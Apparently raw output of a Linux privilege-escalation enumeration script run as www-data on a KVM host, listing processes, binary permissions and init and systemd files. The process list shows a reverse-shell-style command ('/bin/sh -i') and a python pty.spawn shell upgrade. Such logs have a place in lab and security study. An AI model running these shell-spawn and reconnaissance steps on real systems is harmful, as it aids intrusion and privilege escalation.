rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:32:d7:13,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x6 -msg timestamp=on
root       1573  0.0  0.0      0     0 ?        S    Aug10   0:37 [kvm-pit/1568]
libvirt+   1685 14.4  9.4 2330684 766784 ?      Sl   Aug10 235:20 qemu-system-x86_64 -enable-kvm -name FW -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu Westmere -m 1024 -realtime mlock=off -smp 2,sockets=2,cores=1,threads=1 -uuid 4a89bc8c-143f-4a45-ae65-84a9978fc5e7 -nographic -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-FW/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x5.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x5 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x5.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x5.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x4 -drive file=/var/lib/libvirt/images/FW.vmdk,format=vmdk,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=26,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:74:9d:17,bus=pci.0,addr=0x3 -netdev tap,fd=28,id=hostnet1 -device rtl8139,netdev=hostnet1,id=net1,mac=52:54:00:32:59:e0,bus=pci.0,addr=0x7 -netdev tap,fd=29,id=hostnet2 -device rtl8139,netdev=hostnet2,id=net2,mac=52:54:00:82:69:f5,bus=pci.0,addr=0x8 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x6 -msg timestamp=on
root       1690  0.0  0.0      0     0 ?        S    Aug10   0:43 [kvm-pit/1685]
libvirt+   1732  5.1 29.8 3452004 2437432 ?     Sl   Aug10  84:32 qemu-system-x86_64 -enable-kvm -name WEB -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu Westmere -m 2048 -realtime mlock=off -smp 2,sockets=2,cores=1,threads=1 -uuid 765c33b7-c165-49fb-ac76-ccd251b80f13 -nographic -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-WEB/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x5.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x5 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x5.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x5.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x4 -drive file=/var/lib/libvirt/images/WEB01.vmdk,format=vmdk,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive file=/dev/sr0,format=raw,if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=27,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:01:c6:b8,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x6 -msg timestamp=on
root       1737  0.0  0.0      0     0 ?        S    Aug10   0:38 [kvm-pit/1732]
libvirt+   1779  5.1 28.8 3479612 2354096 ?     Sl   Aug10  83:46 qemu-system-x86_64 -enable-kvm -name FILE -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu Westmere -m 2048 -realtime mlock=off -smp 2,sockets=2,cores=1,threads=1 -uuid 2ba34a36-6c28-4bcf-a8f6-c160e218d507 -nographic -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-FILE/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x6.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x6 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x6.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x6.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x5 -drive file=/var/lib/libvirt/images/FILE.vmdk,format=vmdk,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=28,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:8f:b9:f9,bus=pci.0,addr=0x4 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x7 -msg timestamp=on
root       1784  0.0  0.0      0     0 ?        S    Aug10   0:36 [kvm-pit/1779]
root       6616  0.0  0.0      0     0 ?        S    Aug10   0:12 [kworker/1:1]
root      10837  0.0  0.0      0     0 ?        S    Aug10   0:29 [kworker/0:2]
root      11753  0.0  0.0      0     0 ?        S    00:20   0:04 [kworker/3:0]
root      14238  0.0  0.0      0     0 ?        S    05:08   0:02 [kworker/3:1]
root      14656  0.0  0.0      0     0 ?        S    05:55   0:02 [kworker/1:2]
root      14846  0.0  0.0      0     0 ?        S    06:10   0:03 [kworker/2:2]
www-data  15717  0.0  0.0 244824  7884 ?        S    07:35   0:00 php-fpm: pool www
root      15805  0.0  0.0      0     0 ?        S    07:42   0:00 [kworker/u256:0]
root      15837  0.0  0.0      0     0 ?        S    07:47   0:00 [kworker/0:0]
root      15847  0.0  0.0      0     0 ?        S    07:48   0:00 [kworker/u256:1]
www-data  15895  0.0  0.0   4508   852 ?        S    07:56   0:00 sh -c uname -a; w; id; /bin/sh -i
www-data  15899  0.0  0.0   4508   708 ?        S    07:56   0:00 /bin/sh -i
www-data  15904  0.0  0.0  18024  2840 ?        S    07:57   0:00 bash
www-data  15914  0.0  0.0  32212  6804 ?        S    07:58   0:00 python -c import pty;pty.spawn("/bin/bash");
www-data  15915  0.0  0.0  18260  3316 pts/4    Ss   07:58   0:00 /bin/bash
root      15932  0.0  0.0      0     0 ?        S    08:00   0:00 [kworker/u256:2]
www-data  15957  0.1  0.0  18996  3908 pts/4    S+   08:04   0:00 bash
www-data  15958  0.0  0.0  19100  3612 pts/4    S+   08:04   0:00 bash
www-data  15959  0.0  0.0   4384   676 pts/4    S+   08:04   0:00 tee -a
www-data  16151  0.0  0.0  19100  2924 pts/4    S+   08:04   0:00 bash
www-data  16152  0.0  0.0  34424  2956 pts/4    R+   08:04   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  1037528 May 16  2017 /bin/bash
lrwxrwxrwx 1 root root        4 Oct  1  2017 /bin/sh -> dash
-rwxr-xr-x 1 root root   326224 Jul 19  2017 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root   618520 Jul 19  2017 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root   141904 Jul 19  2017 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root   453240 Jul 19  2017 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root    44104 Jun 14  2017 /sbin/agetty
-rwxr-xr-x 1 root root   145936 Jan 18  2016 /sbin/cgmanager
lrwxrwxrwx 1 root root       20 Oct  1  2017 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root   783984 Jul 26  2017 /sbin/iscsid
-rwxr-xr-x 1 root root    51336 Apr 16  2016 /sbin/lvmetad
-rwxr-xr-x 1 root root   513216 Sep 14  2017 /sbin/mdadm
-rwxr-xr-x 1 root root   224208 Jan 12  2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root    18504 Jul  5  2017 /usr/bin/lxcfs
-rwxr-xr-x 1 root root    44528 Feb  9  2017 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root 20031344 Aug 31  2017 /usr/lib/snapd/snapd
-rwxr-xr-x 1 root root    48112 Apr  8  2016 /usr/sbin/acpid
-rwxr-xr-x 1 root root    26632 Jan 14  2016 /usr/sbin/atd
-rwxr-xr-x 1 root root    44472 Apr  5  2016 /usr/sbin/cron
-rwxr-xr-x 1 root root   372072 Sep 26  2017 /usr/sbin/dnsmasq
-rwxr-xr-x 1 root root   478896 Aug 23  2017 /usr/sbin/libvirtd
-rwxr-xr-x 1 root root   599328 Apr  5  2016 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   799216 Mar 16  2017 /usr/sbin/sshd
-rwxr-xr-x 1 root root   589280 Aug 23  2017 /usr/sbin/virtlogd


[-] /etc/init.d/ binary permissions:
total 368
drwxr-xr-x   2 root root  4096 Oct  4  2017 .
drwxr-xr-x 103 root root  4096 Oct  4  2017 ..
-rw-r--r--   1 root root  1319 Oct  4  2017 .depend.boot
-rw-r--r--   1 root root  1384 Oct  4  2017 .depend.start
-rw-r--r--   1 root root  1322 Oct  4  2017 .depend.stop
-rw-r--r--   1 root root  2427 Jan 19  2016 README
-rwxr-xr-x   1 root root  2243 Feb  9  2016 acpid
-rwxr-xr-x   1 root root  6223 Mar  3  2017 apparmor
-rwxr-xr-x   1 root root  2799 Mar 31  2016 apport
-rwxr-xr-x   1 root root  1071 Dec  6  2015 atd
-rwxr-xr-x   1 root root  1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x   1 root root  3565 Sep 14  2015 cgmanager
-rwxr-xr-x   1 root root  3354 Sep 14  2015 cgproxy
-rwxr-xr-x   1 root root  3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x   1 root root  1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x   1 root root  9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x   1 root root  1343 Apr  4  2016 console-setup
-rwxr-xr-x   1 root root  3049 Apr  5  2016 cron
-rwxr-xr-x   1 root root   937 Mar 28  2015 cryptdisks
-rwxr-xr-x   1 root root   896 Mar 28  2015 cryptdisks-early
-rwxr-xr-x   1 root root  2813 Dec  2  2015 dbus
-rwxr-xr-x   1 root root  4352 Mar 15  2013 ebtables
-rwxr-xr-x   1 root root  1105 Mar 15  2016 grub-common
-rwxr-xr-x   1 root root  1336 Jan 19  2016 halt
-rwxr-xr-x   1 root root  1423 Jan 19  2016 hostname.sh
-rwxr-xr-x   1 root root  3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x   1 root root  1503 Mar 29  2016 iscsid
-rwxr-xr-x   1 root root  1804 Apr  4  2016 keyboard-setup
-rwxr-xr-x   1 root root  1300 Jan 19  2016 killprocs
-rwxr-xr-x   1 root root  2087 Dec 20  2015 kmod
-rwxr-xr-x   1 root root  5968 Aug 11  2017 libvirt-bin
-rwxr-xr-x   1 root root 16499 Aug 23  2017 libvirt-guests
-rwxr-xr-x   1 root root   695 Oct 30  2015 lvm2
-rwxr-xr-x   1 root root   571 Oct 30  2015 lvm2-lvmetad
-rwxr-xr-x   1 root root   586 Oct 30  2015 lvm2-lvmpolld
-rwxr-xr-x   1 root root  2300 Jul  5  2017 lxcfs
-rwxr-xr-x   1 root root  2541 Jun  8  2017 lxd
-rwxr-xr-x   1 root root  2611 Apr 11  2016 mdadm
-rwxr-xr-x   1 root root  1199 Jul 16  2014 mdadm-waitidle
-rwxr-xr-x   1 root root   703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x   1 root root  2301 Jan 19  2016 mountall.sh
-rwxr-xr-x   1 root root  1461 Jan 19  2016 mountdevsubfs.sh
-rwxr-xr-x   1 root root  1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x   1 root root   711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x   1 root root  2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x   1 root root  4771 Jul 19  2015 networking
-rwxr-xr-x   1 root root  4579 Feb 11  2017 nginx
-rwxr-xr-x   1 root root  1581 Oct 16  2015 ondemand
-rwxr-xr-x   1 root root  2503 Mar 29  2016 open-iscsi
-rwxr-xr-x   1 root root  1578 Sep 18  2016 open-vm-tools
-rwxr-xr-x   1 root root  4987 Aug  9  2017 php7.0-fpm
-rwxr-xr-x   1 root root  1366 Nov 15  2015 plymouth
-rwxr-xr-x   1 root root   752 Nov 15  2015 plymouth-log
-rwxr-xr-x   1 root root  1192 Sep  6  2015 procps
-rwxr-xr-x   1 root root   778 Mar 15  2016 qemu-kvm
-rwxr-xr-x   1 root root  6366 Jan 19  2016 rc
-rwxr-xr-x   1 root root   820 Jan 19  2016 rc.local
-rwxr-xr-x   1 root root   117 Jan 19  2016 rcS
-rwxr-xr-x   1 root root   661 Jan 19  2016 reboot
-rwxr-xr-x   1 root root  4149 Nov 23  2015 resolvconf
-rwxr-xr-x   1 root root  4355 Jul 10  2014 rsync
-rwxr-xr-x   1 root root  2796 Feb  3  2016 rsyslog
-rwxr-xr-x   1 root root  1226 Jun  9  2015 screen-cleanup
-rwxr-xr-x   1 root root  3927 Jan 19  2016 sendsigs
-rwxr-xr-x   1 root root   597 Jan 19  2016 single
-rw-r--r--   1 root root  1087 Jan 19  2016 skeleton
-rwxr-xr-x   1 root root  4077 Mar 16  2017 ssh
-rwxr-xr-x   1 root root  6087 Apr 12  2016 udev
-rwxr-xr-x   1 root root  2737 Jan 19  2016 umountfs
-rwxr-xr-x   1 root root  2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x   1 root root  1879 Jan 19  2016 umountroot
-rwxr-xr-x   1 root root  1391 Apr 20  2017 unattended-upgrades
-rwxr-xr-x   1 root root  3111 Jan 19  2016 urandom
-rwxr-xr-x   1 root root  4088 Aug 11  2017 virtlockd
-rwxr-xr-x   1 root root  3987 Aug 11  2017 virtlogd
-rwxr-xr-x   1 root root  2757 Nov 10  2015 x11-common


[-] /etc/init/ config file permissions:
total 164
drwxr-xr-x   2 root root 4096 Oct  5  2017 .
drwxr-xr-x 103 root root 4096 Oct  4  2017 ..
-rw-r--r--   1 root root  338 Apr  8  2016 acpid.conf
-rw-r--r--   1 root root 3709 Mar  3  2017 apparmor.conf
-rw-r--r--   1 root root 1626 Jul 17  2017 apport.conf
-rw-r--r--   1 root root 1305 Sep 14  2015 cgmanager.conf
-rw-r--r--   1 root root  956 Sep 14  2015 cgproxy.conf
-rw-r--r--   1 root root  250 Apr  4  2016 console-font.conf
-rw-r--r--   1 root root  509 Apr  4  2016 console-setup.conf
-rw-r--r--   1 root root  297 Apr  5  2016 cron.conf
-rw-r--r--   1 root root  412 Mar 28  2015 cryptdisks-udev.conf
-rw-r--r--   1 root root 1519 Mar 28  2015 cryptdisks.conf
-rw-r--r--   1 root root  482 Sep  1  2015 dbus.conf
-rw-r--r--   1 root root  284 Jul 23  2013 hostname.conf
-rw-r--r--   1 root root  300 May 21  2014 hostname.sh.conf
-rw-r--r--   1 root root  561 Mar 14  2016 hwclock-save.conf
-rw-r--r--   1 root root  674 Mar 14  2016 hwclock.conf
-rw-r--r--   1 root root  109 Mar 14  2016 hwclock.sh.conf
-rw-r--r--   1 root root  689 Aug 20  2015 kmod.conf
-rw-r--r--   1 root root 1553 Aug 11  2017 libvirt-bin.conf
-rw-r--r--   1 root root  540 Jul  5  2017 lxcfs.conf
-rw-r--r--   1 root root  813 Jun  8  2017 lxd.conf
-rw-r--r--   1 root root  530 Jun  2  2015 network-interface-container.conf
-rw-r--r--   1 root root 1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--   1 root root  933 Jun  2  2015 network-interface.conf
-rw-r--r--   1 root root 2493 Jun  2  2015 networking.conf
-rw-r--r--   1 root root  401 Feb 11  2017 nginx.conf
-rw-r--r--   1 root root  568 Feb  1  2016 passwd.conf
-rw-r--r--   1 root root  398 Aug  9  2017 php7.0-fpm.conf
-rw-r--r--   1 root root  363 Jun  5  2014 procps-instance.conf
-rw-r--r--   1 root root  119 Jun  5  2014 procps.conf
-rw-r--r--   1 root root  163 Mar 15  2016 qemu-kvm.conf
-rw-r--r--   1 root root  457 Jun  3  2015 resolvconf.conf
-rw-r--r--   1 root root  426 Dec  2  2015 rsyslog.conf
-rw-r--r--   1 root root  230 Apr  4  2016 setvtrgb.conf
-rw-r--r--   1 root root  641 Mar 16  2017 ssh.conf
-rw-r--r--   1 root root  337 Apr 12  2016 udev.conf
-rw-r--r--   1 root root  360 Apr 12  2016 udevmonitor.conf
-rw-r--r--   1 root root  352 Apr 12  2016 udevtrigger.conf
-rw-r--r--   1 root root  683 Feb 24  2015 ureadahead-other.conf
-rw-r--r--   1 root root  889 Feb 24  2015 ureadahead.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.3M
drwxr-xr-x 26 root root  20K Oct  4  2017 system
drwxr-xr-x  2 root root 4.0K Oct  1  2017 system-sleep
drwxr-xr-x  2 root root 4.0K Oct  1  2017 system-generators
drwxr-xr-x  2 root root 4.0K Oct  1  2017 system-preset
drwxr-xr-x  2 root root 4.0K Oct  1  2017 network
-rwxr-xr-x  1 root root 443K Jul 19  2017 systemd-udevd
-rwxr-xr-x  1 root root 828K Jul 19  2017 systemd-networkd
-rwxr-xr-x  1 root root  31K Jul 19  2017 systemd-reply-password
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-rfkill
-rwxr-xr-x  1 root root 143K Jul 19  2017 systemd-shutdown
-rwxr-xr-x  1 root root  71K Jul 19  2017 systemd-sleep
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-backlight
-rwxr-xr-x  1 root root  47K Jul 19  2017 systemd-binfmt
-rwxr-xr-x  1 root root 301K Jul 19  2017 systemd-fsck
-rwxr-xr-x  1 root root 276K Jul 19  2017 systemd-initctl
-rwxr-xr-x  1 root root 319K Jul 19  2017 systemd-journald
-rwxr-xr-x  1 root root 605K Jul 19  2017 systemd-logind
-rwxr-xr-x  1 root root  51K Jul 19  2017 systemd-modules-load
-rwxr-xr-x  1 root root  35K Jul 19  2017 systemd-random-seed
-rwxr-xr-x  1 root root 333K Jul 19  2017 systemd-timedated
-rwxr-xr-x  1 root root  35K Jul 19  2017 systemd-user-sessions
-rwxr-xr-x  1 root root  15K Jul 19  2017 systemd-ac-power
-rwxr-xr-x  1 root root 268K Jul 19  2017 systemd-cgroups-agent
-rwxr-xr-x  1 root root 332K Jul 19  2017 systemd-hostnamed
-rwxr-xr-x  1 root root 123K Jul 19  2017 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  35K Jul 19  2017 systemd-quotacheck
-rwxr-xr-x  1 root root 653K Jul 19  2017 systemd-resolved
-rwxr-xr-x  1 root root 139K Jul 19  2017 systemd-timesyncd
-rwxr-xr-x  1 root root 276K Jul 19  2017 systemd-update-utmp
-rwxr-xr-x  1 root root 1.6M Jul 19  2017 systemd
-rwxr-xr-x  1 root root  55K Jul 19  2017 systemd-activate
-rwxr-xr-x  1 root root 103K Jul 19  2017 systemd-bootchart
-rwxr-xr-x  1 root root 352K Jul 19  2017 systemd-bus-proxyd
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-cryptsetup
-rwxr-xr-x  1 root root 340K Jul 19  2017 systemd-localed
-rwxr-xr-x  1 root root  51K Jul 19  2017 systemd-remount-fs
-rwxr-xr-x  1 root root  51K Jul 19  2017 systemd-sysctl
-rwxr-xr-x  1 root root  75K Jul 19  2017 systemd-fsckd
-rwxr-xr-x  1 root root  31K Jul 19  2017 systemd-hibernate-resume
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-socket-proxyd
-rwxr-xr-x  1 root root 1.3K Jul  5  2017 systemd-sysv-install
drwxr-xr-x  2 root root 4.0K Apr 12  2016 system-shutdown

/lib/systemd/system:
total 964K
drwxr-xr-x 2 root root 4.0K Oct  1  2017 halt.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 sysinit.target.wants
lrwxrwxrwx 1 root root    9 Oct  1  2017 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Oct  1  2017 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Oct  1  2017 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Oct  1  2017 timers.target.wants
lrwxrwxrwx 1 root root   21 Oct  1  2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Oct  1  2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Oct  1  2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root    9 Oct  1  2017 x11-common.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Oct  1  2017 rc-local.service.d
lrwxrwxrwx 1 root root   16 Oct  1  2017 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Oct  1  2017 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Oct  1  2017 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 resolvconf.service.wants
lrwxrwxrwx 1 root root    9 Oct  1  2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Oct  1  2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Oct  1  2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Oct  1  2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Oct  1  2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Oct  1  2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Oct  1  2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Oct  1  2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Oct  1  2017 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Oct  1  2017 sigpwr.target.wants
lrwxrwxrwx 1 root root    9 Oct  1  2017 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root   14 Oct  1  2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Oct  1  2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Oct  1  2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Oct  1  2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Oct  1  2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Oct  1  2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Oct  1  2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Oct  1  2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Oct  1  2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Oct  1  2017 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Oct  1  2017 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Oct  1  2017 getty.target.wants
drwxr-xr-x 2 root root 4.0K Oct  1  2017 graphical.target.wants
lrwxrwxrwx 1 root root    9 Oct  1  2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Oct  1  2017 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Oct  1  2017 local-fs.target.wants
lrwxrwxrwx 1 root root   28 Oct  1  2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Oct  1  2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Oct  1  2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Oct  1  2017 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root   27 Sep 13  2017 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root   21 Sep 13  2017 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  412 Sep 13  2017 plymouth-halt.service
-rw-r--r-- 1 root root  426 Sep 13  2017 plymouth-kexec.service
-rw-r--r-- 1 root root  421 Sep 13  2017 plymouth-poweroff.service
-rw-r--r-- 1 root root  200 Sep 13  2017 plymouth-quit-wait.service
-rw-r--r-- 1 root root  194 Sep 13  2017 plymouth-quit.service
-rw-r--r-- 1 root root  244 Sep 13  2017 plymouth-read-write.service
-rw-r--r-- 1 root root  416 Sep 13  2017 plymouth-reboot.service
